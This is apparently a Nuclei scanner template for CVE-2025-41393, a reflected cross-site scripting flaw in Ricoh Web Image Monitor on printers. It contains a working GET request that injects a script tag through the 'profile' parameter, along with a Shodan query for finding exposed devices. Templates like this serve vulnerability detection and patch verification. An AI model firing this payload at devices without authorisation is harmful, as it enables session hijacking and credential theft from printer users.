A reflected cross-site scripting vulnerability exists in the laser printers and MFPs (multifunction printers) which implement Ricoh Web Image Monitor. If exploited, an arbitrary script may be executed on the web browser of the user who accessed Web Image Monitor.
PoC代码[已公开]
id: CVE-2025-41393
info:
name: Ricoh Web Image Monitor - Reflected XSS
author: jpg0mez
severity: medium
description: |
A reflected cross-site scripting vulnerability exists in the laser printers and MFPs (multifunction printers) which implement Ricoh Web Image Monitor. If exploited, an arbitrary script may be executed on the web browser of the user who accessed Web Image Monitor.
impact: |
Attackers can execute malicious JavaScript in user browsers through the profile parameter, potentially leading to session hijacking and credential theft.
remediation: |
Apply the security patch from Ricoh for affected Web Image Monitor implementations.
reference:
- https://www.ricoh.com/products/security/vulnerabilities/vul?id=ricoh-2025-000001
- https://jvn.jp/en/jp/JVN20474768/
- https://nvd.nist.gov/vuln/detail/CVE-2025-41393
classification:
epss-score: 0.00621
epss-percentile: 0.69525
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
metadata:
verified: true
max-request: 1
shodan-query: http.html:"Web Image Monitor"
tags: cve,cve2025,ricoh,xss,web,vuln
http:
- method: GET
path:
- "{{BaseURL}}/?profile=</script><script>alert(document.domain)</script>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- 'websys/webArch/mainFrame.cgi'
- 'Web Image Monitor'
condition: and
- type: status
status:
- 200
# digest: 490a0046304402204476bcc835e01191c7708fb483e4706d4b0cd4814ffe59aa5fe6422bd7b92787022074a20558401c243dc5763250bdb2bff92599940313567607df8cf90439eda955:922c64590222798bb761d5b6d8e72950